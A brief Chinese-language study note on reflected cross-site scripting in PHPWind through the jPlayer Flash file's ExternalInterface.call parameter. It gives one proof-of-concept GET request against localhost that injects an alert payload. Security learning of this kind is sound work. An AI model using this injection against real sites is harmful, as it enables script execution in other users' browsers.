【笔记】PHPWind利用Flash实现跨站脚本攻击

发表于 更新于 阅读次数:

前言

PHPWind利用Flash实现跨站脚本攻击
如果swf文件出现了ExternalInterface.call函数调用且变量可以通过参数传递,则可以实现跨站脚本攻击

正文

request
1
GET http://127.0.0.1:80/www/res/js/dev/util_libs/jPlayer/Jplayer.swf?jQuery=alert(1))}catch{}//

完成

参考文献

哔哩哔哩——xiaodisec